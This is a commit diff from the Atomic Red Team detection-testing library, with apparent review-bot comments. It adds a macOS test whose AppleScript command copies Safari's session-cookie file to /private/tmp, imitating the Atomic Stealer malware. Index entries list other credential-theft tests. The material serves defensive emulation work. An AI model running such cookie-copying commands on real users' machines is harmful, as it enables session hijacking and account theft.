Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2025-02-06 19:16:33 +00:00
parent b34f3d50ff
commit 8eda90a87c
12 changed files with 92 additions and 3 deletions
+1 -1
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1709-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1710-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
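Review bot: the Atomics badge in the `![Atomics](...Atomics-1710-flat.svg)` line moves from 1709 to 1710, which matches the single new test GUID (e57ba07b-3a33-40cd-a892-748273b9b49a) this commit adds to the index, so the generated count is consistent with the rest of the changeset.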
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
+1
@@ -1539,6 +1539,7 @@ credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Window
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -190,6 +190,7 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root acco
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
credential-access,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
@@ -2136,6 +2136,7 @@
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
- Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
- Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
@@ -554,6 +554,7 @@
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
- Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+22
@@ -90100,6 +90100,28 @@ credential-access:
Stop-Process $chromeProcess -Force
name: powershell
elevation_required: false
- name: Copy Safari BinaryCookies files using AppleScript
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
description: 'This command will copy Safari BinaryCookies files using AppleScript
as seen in Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the BinaryCookies file into.
type: path
default: "/private/tmp"
executor:
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
-e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
destinationFolderPath with replacing' -e 'end tell'
cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
name: sh
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
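Review bot: the new atomic (from `- name: Copy Safari BinaryCookies files using AppleScript` through `elevation_required: false`) has no `dependencies` block, so nothing verifies that `Cookies.binarycookies` exists under the user's `Containers:com.apple.Safari:Data:Library:Cookies:` folder before the Finder `duplicate` runs; when it is absent the osascript call fails at that step and `cleanup_command: rm "#{destination_path}/Cookies.binarycookies"` then fails as well because there is nothing to remove. Suggest a `dependencies` entry with a `prereq_command` that tests for the source file, and `rm -f` in the cleanup so a failed run leaves no error noise. The description could also state what a defender should expect to observe from this test, namely an `osascript` child of `sh` driving Finder to copy a file out of the Safari container into `#{destination_path}`, since that is the behaviour detection content for T1539 on macOS should be validated against.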
+22
@@ -49505,6 +49505,28 @@ credential-access:
cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
name: bash
elevation_required: false
- name: Copy Safari BinaryCookies files using AppleScript
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
description: 'This command will copy Safari BinaryCookies files using AppleScript
as seen in Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the BinaryCookies file into.
type: path
default: "/private/tmp"
executor:
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
-e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
destinationFolderPath with replacing' -e 'end tell'
cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
name: sh
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
+39
@@ -20,6 +20,8 @@ After an adversary acquires a valid cookie, they can then perform a [Web Session
- [Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)](#atomic-test-4---steal-chrome-v127-cookies-via-remote-debugging-windows)
- [Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript](#atomic-test-5---copy-safari-binarycookies-files-using-applescript)
<br/>
@@ -261,4 +263,41 @@ Stop-Process $chromeProcess -Force
<br/>
<br/>
## Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
**Supported Platforms:** macOS
**auto_generated_guid:** e57ba07b-3a33-40cd-a892-748273b9b49a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Specify the path to copy the BinaryCookies file into. | path | /private/tmp|
#### Attack Commands: Run with `sh`!
```sh
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
```
#### Cleanup Commands:
```sh
rm "#{destination_path}/Cookies.binarycookies"
```
<br/>
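Review bot: the inputs table row `| destination_path | Specify the path to copy the BinaryCookies file into. | path | /private/tmp|` drops the space before its closing pipe that the header row has; Markdown still renders it, but the generator template should emit `/private/tmp |` so the table matches the other technique pages. The section also has no Dependencies block because the YAML defines none, so readers of this page get no hint that the attack command fails outright when the Safari cookie file is not present and that the cleanup `rm` then errors for the same reason.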
+1
@@ -161,6 +161,7 @@ atomic_tests:
elevation_required: false
- name: Copy Safari BinaryCookies files using AppleScript
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
description: |
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
supported_platforms:
+1
@@ -1733,3 +1733,4 @@ a3cc9c95-c160-4b86-af6f-84fba87bfd30
e04d2e89-de15-4d90-92f9-a335c7337f0f
87a4a141-c2bb-49d1-a604-8679082d8b91
5c32102a-c508-49d3-978f-288f8a9f6617
e57ba07b-3a33-40cd-a892-748273b9b49a